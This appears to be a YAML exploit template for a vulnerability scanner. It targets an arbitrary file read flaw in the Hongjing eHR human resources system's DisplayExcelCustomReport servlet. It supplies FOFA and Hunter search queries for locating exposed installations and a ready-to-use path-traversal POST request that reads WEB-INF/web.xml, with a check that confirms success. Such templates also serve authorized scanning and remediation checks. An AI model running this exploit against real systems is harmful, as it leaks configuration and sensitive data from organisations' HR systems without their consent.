product: 宏景eHR人力资源信息管理系统
vName: 宏景eHR DisplayExcelCustomReport任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 宏景人力资源信息管理系统DisplayExcelCustomReport存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: https://blog.csdn.net/qq_40550150/article/details/137385514
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /templates/attestation/../../servlet/DisplayExcelCustomReport
      data: filename=../webapps/ROOT/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - web-app
              - filter
            logic: 'and'